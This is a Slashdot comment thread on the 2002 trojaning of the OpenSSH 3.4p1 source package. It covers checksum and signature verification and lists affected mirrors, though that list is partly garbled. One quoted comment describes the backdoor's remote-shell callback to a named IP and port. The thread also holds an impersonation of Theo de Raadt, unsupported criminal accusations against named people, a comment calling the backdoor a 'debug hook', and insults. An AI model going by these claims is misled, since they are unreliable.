i would wait until more information is available before jumping to what i would consider to be a silly conclusion.
-- john
Checking the md5sum just means the package matches the checksum. No good if the intruder updates the md5sum file. At least if there's an OpenPGP signature they have to compromise the private key first.
Gee, why would you want to do that? I thought everyone who broke into insecure systems was a good-natured Robin Hood, a "white hat" who was just trying to help the poor stupid admins out of the goodness of his or her heart.
:) *sorry, joke*
Enough sarcasm, this *was* malicious simply because this could have been a setup for a DDoS attack.
Theres a big difference between breaking into a system then reporting the issue to the admin, and breaking into a system via a trojaned makefile/config only to gain root/user shell access for no other reason than to use them for some other purpose.
now you know the difference between black hat, and white hat.
of course then you have those individuals that make tools that encompass an entire OS, leaving the original interface a complete mystery to the user. These hackers are known as red hat
-- This space for lease, low setup fee, inquire within!
Alan Cox was calling Theo to task because he didn't like how Theo concealed the exact security problem until a workaround was given out. This is an attitude some developers have. It's not the best attitue from a customer/end-user standpoint, but some people who write code and give it for free use still don't understand it. Alanx Cox sounds like, despite him being a valuable asset to the community, he does not understand this.
If he'd have said, "for all we know, OpenBSD could attract near-earth bodies" would you post this comment as "eerily prescient" on the recent asteroid stories? Sometimes things just aren't related. Despite what Mulder may think.
--
Internet Explorer (n): Another bug -- that is, a feature that can't be turned off -- in Windows.
The md5sums are not enough. Someone trustworthy[1] should
u bl ickey.html
sign the package and then make the public key available
from various other trustworthy sources (three, at least).
Red Hat does this *right*:
http://www.redhat.com/solutions/security/news/p
Both the openssh and openssl people have to make pages like
the one above. If such pages do exists please pretty please
post them here because I haven't seen them. Where are the
"official" openssh and openssl public keys? They are not
mentioned anywhere on either sites' pages!
[1] The definition of "trustworthy" is not trivial. Personally,
a public key found on both the Red Hat site *and* a
box-wrapped CD qualifies. YMMV.
Also apt seems to have signed packages, but seems to be not widely used, as you can see here: http://www.kitenet.net/~joey/pkg-comp/#foot1
I downloaded the portable version of OpenSSH 3.4p1 pretty much as soon as it was released from ftp.openssh.com, and it's got the correct MD5 sum.
The timestamp on my copy of the openssh-3.4p1.tar.gz file is June 26th.
Anyone know when the trojan file was put in place?
All I can tell you is, let this be a lesson against using anything other than OpenBSD. At least we bother to look over our source code for security holes. We are still investigating exactly what led to the NetBSD machine being rooted, but we have a fair idea that it had something to do with the USB subsystem in the kernel. This is totally inexcusable. Just another reason to avoid that over-extended, slow, stinking pile of source code that is NetBSD. They oughta at least be grateful to me for finding this security hole for them, after all they've done to screw us over.
--
Theo DeRaadt
Founder, OpenBSD project.
This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system: ...
This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:...
And we know you're not the cracker, and we should believe you because ... oh, it's posted on /. so it must be true.
pr0n - keeping monitor glass spotless since 1981.
Do these titles bother anyone else? When I read "OpenSSH Package Trojaned" I feel a NEED to read up on it and figure out exactly where the trojan is and what might be affected. But then in the comments it says oh, its not really a trojan, just a hack. Can we please stop with these threats of terror, haven't we all had enough by now? And no we don't care how much it sells.
I don't think these bugs are symptoms of a systemic problem.
This trojan disturbs me a bit more than those bugs buried in thousands of lines of code. I guess I expect the OpenBSD guys to be good sysadmins, since, well, it just seems like something that should be their bag, baby. And maybe some will disagree with me, but I think that securely adminning a box is easier than writing secure code. (Maybe I'm just prejudiced because I'm a programmer. ;-)
If a trojan got onto OpenBSD's own FTP server, it means that somebody fucked up. Maybe they're not keeping their box up-to-date with the latest fixes. (And it looks like they're not "eating their own dog food," and eating Sun dog food instead. That is ridiculous.) Or maybe, worst of all, some black hat knows about a hole that nobody else knows about. I don't know; I just know I really don't like this. I hope they get on the ball, regarding their unsecure server, muy pronto.
There is a good side to all this, though. I actually give money to OpenBSD (not a lot, but it's something) because I want somebody out there doing OS and OS-related stuff, to be over-the-top paranoid, and I think OpenBSD is the right team (I guess they've got the best slogans). I selfishly want more secure tools to get into circulation, so that I can be among those who use them. And from that perspective, this incident is a fscking godsend, because I think it might result in people starting to adopt some better habits, which will also require some better tools and social networks:
The solution to this trojan problem is not for people to start checking the MD5 sum on their tarballs. If you can't trust an FTP server to give you an unaltered file, then you can't trust a web server to give you a web page with an unaltered MD5 sum. Surely this is common sense?
The real solution is digital signatures (i.e. an MD5 sum encrypted with a private key). And for that to really work, we're going to have to build up a web of trust, so that people will know whether or not they really have a publisher's public key, or an imposter's. Maybe this will get us a little closer to the day when I can encrypt every email I send, and have to decrypt ever email I receive, except for the spam which gets thrown away automatically since it's the only thing that isn't signed by someone accountable.
It is hard to get people to use GPG. Real hard. Try convincing a friend (I mean a geeky friend; non-geeks are impossible) to use it, or try to organize a signing party sometime. I don't know why there's so much resistance and apathy, but it's there. We need all the help we can get, and today we got some.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
Hmm. An extremely easy-to-spot (read dumb) trojan appears on the eve of defcon. The attackers had the wherewithall to get a compromised package onto the OpenBSD machines, but did so in a way that basically guaranteed it would be discovered quickly.
Doesn't this seem a little odd?
Looks like a play to discredit OpenBSD. Not to actually infect machines.
The server hosting the file was compromised somehow.
There was no code submission oversight, nor is there likely to ever be one.
I don't know when the trojan appeared exactly, but as one who uses Gentoo at both work and at home, I can attest to the following:
- Gentoo mirrors the source tarball at ibiblio and elsewhere, the current ssh being 3.4p1
- The MD5sum for the Gentoo ebuild is correct
- The mirrored tarball is also correct
- I've had no trouble installing the current openssh over the last several days
- I have personally verified the md5sums on each machine, not one of them contained the trojaned version, confirming that Gentoo's ebuild system did in fact correctly check the md5sum, had the correct md5sum, and had the correct source tarball.
We still need to have each ebuild, and IMHO each tarball, GPG signed by the appropriate developer, with separate third party trusted sources for the public keychain (and the ability to purchase the keychain on CD-Rom from trusted sources for the ultra-paranoid). I've been grousing about this off and on for over a year now (in Debian, later Source Mage, and now Gentoo, all of which need to address this. Maybe now they will.)The Future of Human Evolution: Autonomy
Probably because they hope it won't raise much suspicion. Using 1337, 31337, etc would be like waving a flag.
If it'd be up to me, I'd use one of the less known ip protocols.
Check out http://www.openssh.org/txt/trojan.adv
The world doesn't need you.
It only shows how many people _who are interested in your packages_ check the md5/pgp key.
I don't think most servers, especially important and secure ones, run a mp3/ogg streamer. That would be home users, mostly. Joe 'admin' Sixpack. And well... 'nuff said.
as I do on my private Linux box, and you don't get this type of crap, nor the last security hole related to OpenSSH, which never did exist in the non-commercial SSH.com version which is free for all to use for non-profit(evaluation) purposes. It is freely available for download through SSH.com (source or binary I believe). One too many goofs with OpenSSH recently...as far as I'm concerned. Maybe I'm paranoid... but so what? So is everyone else.
'A lie if repeated often enough, becomes the truth.' - Goebbels
OpenSSH has had quite a few security flaws lately and this just hurts it more. ssh from ssh.fi is much better. No 2,000 dependancies, a much better security history, and its all ssh2. OpenSSH is the new sendmail/wuftpd, but nobody wants to admit it.
I just rebuilt OpenSSH-portable yesterday on my FreeBSD box, finally getting around to addressing the newest vulnerabilities in 3.3.
I did a cvsup of the entire ports tree, then built OpenSSH-portable-3.4p1 as root. The build went fine; no MD5 checksum problems were reported. Did I get in just after the problem had been fixed, or am I screwed?
BTW, pkg_info now reports that I have openssh-portable-3.4p1 installed alongside openssh-portable-3.3 (the last version I built from ports). Is this a problem? If so, how do I fix it?
Schwab
Editor, A1-AAA AmeriCaptions
If you look at the parent author's posting history, you'll see that he is nothing more than a troll who fools people into thinking that he is Theo. (Incidentally, the name is "Theo de Raadt", not "Theo DeRaadt".)
Please mod the parent into oblivion.
Tarsnap: Online backups for the truly paranoid
repeat: norm, my ass.
you spelled your name wrong!
Slashdot : - : A load of shit monkeys who think they are professional experts because they were able get a slashdot account and use a string of words with letters longer than 7 characters in a sentence that sounds remotely coherent.
1.Usually found downloading pornographic material and spending all week downloading upgrades.
2.Rarely if ever contributes original ideas or projects. See (1); Too busy upgrading.
Hopefully, this has already been posted by the orginal emailer, but Tomi Nylund posted a list on bugtraq list with a list of affected servers.
t ab le/openssh-3.4p1.tar.gz)= . 4p 1.tar.gz)= e nB SD/OpenSSH/portable/openssh-3.4p1.tar.gz)= p en ssh-3.4p1.tar.gz)= o pe nssh-3.4p1.tar.gz)= g /p ub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= . 4p 1.tar.gz)= l e/ openssh-3.4p1.tar.gz)= r ta ble/openssh-3.4p1.tar.gz)= l e/ openssh-3.4p1.tar.gz)= r ta ble/openssh-3.4p1.tar.gz)= o m/ pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = l e/ openssh-3.4p1.tar.gz)= l e/ openssh-3.4p1.tar.gz)= p en SSH/portable/openssh-3.4p1.tar.gz)= S H/ portable/openssh-3.4p1.tar.gz)= o pe nssh-3.4p1.tar.gz)= S SH /portable/openssh-3.4p1.tar.gz)= p or table/openssh-3.4p1.tar.gz)= t ab le/openssh-3.4p1.tar.gz)=
"Anyways, we did some research here at Oulu regarding the propagation of
the
trojaned OpenSSH-3.4p1.tar.gz, and found out the following:
Trojaned mirrors:
3ac9bc346d736b4a51d676faa2a08a57
MD5
(./ftp.club-internet.fr/pub/OpenBSD/OpenSSH/por
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.easynet.be/openssh/portable/openssh-3
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.freenet.de/pub/ftp.openbsd.org/pub/Op
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.fsn.hu/pub/OpenBSD/OpenSSH/portable/o
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.inet.no/pub/OpenBSD/OpenSSH/portable/
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.isu.net.sa/pub/mirrors/ftp.openbsd.or
3ac9bc346d736b4a51d676faa2a08a57 MD5
(./ftp.jaquet.dk/pub/openSSH/portable/openssh-3
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.openbsd.cz/pub/OpenBSD/OpenSSH/portab
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.openbsd.org.br/pub/OpenBSD/OpenSSH/po
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.openbsd.ru/pub/OpenBSD/OpenSSH/portab
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.sajinet.com.pe/pub/OpenBSD/OpenSSH/po
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.stealth.net/pub/mirrors/ftp.openssh.c
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.tku.edu.tw/pub/OpenBSD/OpenSSH/portab
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.uninett.no/pub/OpenBSD/OpenSSH/portab
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.volftp.mondadori.com/mirror/openbsd/O
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp7.usa.openbsd.org/pub/os/OpenBSD/OpenS
3ac9bc346d736b4a51d676faa2a08a57
MD5(./hal.csd.auth.gr/mirrors/OpenSSH/portable/
3ac9bc346d736b4a51d676faa2a08a57
MD5(./openbsd.csie.nctu.edu.tw/pub/OpenBSD/Open
3ac9bc346d736b4a51d676faa2a08a57
MD5(./openbsd.nsysu.edu.tw/pub/OpenBSD/OpenSSH/
3ac9bc346d736b4a51d676faa2a08a57
MD5(./openbsd.rug.ac.be/pub/OpenBSD/OpenSSH/por
"
forget it.
Seriously though, does anyone know how it happened yet? I have seen lots of talk about the trojan but nothing about how the trojan got there in the first place. This seems like it could be the tip of the iceberg.
turn-of-the-phrase Theo will spin this one with!
Open BSD - no exploits since the last full moon in an 'r' month'
> It compiles a daemon that tries to contact 203.62.158.32 on port 6667 and offers a remote shell for the user compiling the package. After that all files involved are removed and the makefile changed to the original one.
This sounds like a fairly conventional sort of debug hook. Connect back to the source archive where there are lots of debug and alpha-release goodies, let the installer download stuff, and compile it all into the binaries. Just what you'd want when you're developing stuff and want to make it easy to install on test machines.
I've also sometimes forgotten to remove the debug hooks.
Those who do study history are doomed to stand helplessly by while everyone else repeats it.
I respect OpenSource, I also appreciate spending money. Not to confuse the two, but, one wonders whether or not we should trust, to much, the whim of the written word on the net.
Are you really there, all of you, can you prove you exist and are not just some spamming, turing test/machine type thing?....
No, this is _not_ flamebait, just my 2 cents :-)
Is there a new "blackhat" 0day exploit circulating that never appeared on Bugtraq ?
This is the second time the obsd-team is being targetted by hackers unknown, the first time with an unexpected exploit in Apache with a followup-0wning of monkey.org and subsequent backdooring of the dsniff/fragrouter sources (which i'm sure everybody knows about by now), and now the OpenSSH sources gets backdoored, and somebody in the obsd-team will vigourosly defend their honor and will claim that some local exploit was used to gain access. C'mon, i'm sure these security-minded people will have their system secure...
History keeps repeating itself..
Bodø community site
It has been confirmed that the hacker group known as ADM was behind the trojanning of irssi, dsniff, and OpenSSH. You'll notice all trojans are very similar and that the latest contains the switch() cases of 'A', 'D', 'M'.
i .security.is/FAQ.php?faq=official
i .security.is/links.php
The ADM website is at http://ADM.freelsd.net/
They were responsible for creating the Anti-Security movement, which used to be accessible at http://anti.security.is. That movement promoted non-disclosure and encouraged hackers to send trojans to the security mailing lists and to backdoor distro site packages. You can see their FAQ archived here:
http://web.archive.org/web/20010702072841/
ant
And you can see the recommendation to trojan distro site packages by following the link here:
http://web.archive.org/web/20010802063339/
ant
("protect the bug foundation" was written by an ADM member and details how it is necessary to trojan packages to maintain a state of insecurity.)
K2, from the Honeynet Project, is a known member of ADM.
K2 works for CORE Security.
ADM is a subset of w00w00 Security Development (http://www.w00w00.org/)
DugSong (dsniff author, OpenBSD developer) is a member of w00w00 Security Development
DugSong said that his monkey.org machine was compromised by an EPIC client remote vulnerability, but despite protests from other groups, did not disclose any details of this remote vulnerability.
DugSong did not disclose any details of this vulnerability because he knows it was discovered by ADM, and although he is of reputable character, he did not want to aggravate ADM.
It's not a conspiracy theory. Anyone spending enough time on IRC and paying close attention can see the truth.
Running the latest versions of daemons means absolutely nothing when you're dealing with skilled exploit coders who most likely have a stash of unreleased exploits.
It's really time we stop ignoring the facades created by these so-called whitehat groups like w00w00. Individuals like K2 should stop being branded as security professionals and this criminal activity should be punished, rather than indifferently admired.
I am glad to hear that nerds are using protection during SSH. The fear of STDs is a major factor these days, especially with multiple partners.
SCO (noun.)- A Slimy Corporate Ogre. Often seeks free money.
Hooray for OSS!!!
I don't want to write a book here, so I'll keep this short...
It has been known for quite some time that the OpenBSD dev boxes (cvs/www.openbsd.org, etc) have been comprimised. This incident didn't surprise me in the least.
I'm not trying to be a troll, but whenever you say you're OS is "the most secure one available" or something of the like, you're going to become a target of blackhats (apache and openssh remote root).
I guess the bottom line is, don't become cocky about your security!
HAHAHAHHAHAHAHAHHAHA - the fags at zdnet didnt post this story. losers.
Work with me on this one.
The release is trojaned.
The first guy to be openly curious about it in the wild is Mav. Out of the tens of thousands that might have gotten it alredy.
Mav goes and seeks input from his mate Sarge.
Sarge just happens to be the owner of the box that is the callback for this trojan.
Mav posts to slashdot, giving some of the discovery credit to Sarge.
I am just asking, exactly how unlikely do the odds have to be before you got to accept that it is obviously something more than freak coincidence.
Nathan...
Does anyone have an idea whether the cygwin sshd is affected? 3.4p1 is the current version, and they may have built it based upon the trojaned source. I don't know where these guys get their source from.
GekkePrutser
It answer inverse DNS with "203.62.158.32".
An engineer who ran for Congress. http://herbrobinson.us
applejacks : a-puhl-jackz : A shitmonkey who thinks he is witty and insightful because he was able to get a slashdot account and use a string of words longer than 7 characters in a sentence that sounds remotely coherent.
1. Usually found staring at http://goatse.cx/hello.jpg and pounding his fat, sticky fingers on his keyboard to share "LOL"s with his fellow AOL lusers.
2. Rarely if ever contributes on-topic discussion. See (1); lacks a two-digit number of brain cells.
why now? this whole episode seems to be a good example of the current system working well... tarball trojaned, ports system detects md5 mismatch, no compromise, no problem.
Yes, and No.
Yes, in that it showed the strength of free software's openness with information, such that as soon as one person noticed something funny, the news got out and the trojan averted.
No, because in fact we just got really, really lucky. If the MD5sum hadn't been located on a different (uncompromised) server, the attacker(s) could have changed the MD5sum as well, and it might have been weeks, months, or longer before anyone noticed. My bet is on weeks, since someone would have poked at the code, but one can never be sure.
In other words, the current approach didn't really work, it just got lucky. MD5sums are great for identifying corrupt data or incomplete downloads, but they are neither designed for, nor good at, identifying hostile, deliberate sabatage.
GPG signatures, on the other hand, combine the strengths of MD5sums with the ability to immediately recognize a file that has been placed in an archive by someone other then the recognized, official developer, and would have prevented this entire thing regardless of where the signature is located (assuming the keys themselves are properly managed: available on multiple, independent keyservers, downloadable from multiple archive sites like ibiblio, etc., and available for purchase on CDROM for the ultra-paranoid).
The Future of Human Evolution: Autonomy